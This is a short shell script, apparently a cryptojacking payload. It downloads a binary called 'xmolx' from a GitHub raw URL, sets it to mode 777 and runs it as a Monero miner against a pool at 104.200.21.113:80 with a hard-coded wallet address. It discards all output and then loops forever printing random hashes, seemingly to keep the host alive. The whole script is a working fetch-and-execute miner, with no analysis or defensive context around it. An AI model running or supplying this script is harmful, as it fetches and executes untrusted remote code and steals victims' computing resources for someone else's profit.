#!/bin/sh
wget https://github.com/aqshakuy/filebatur/raw/master/xmolx
chmod 777 xmolx
./xmolx --coin=XMR -o 104.200.21.113:80 -u 86bqyB1FLa39SVdf5HzEmT1NfuKi9auJej4sYBqptTTU4Wz17ZeBmfa7nZYiEBVW4CNeJNi3UZFmJhNcfmd4zqVKJeirEK5.$(echo $(shuf -i 1-20000 -n 1)-GG) -p x >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
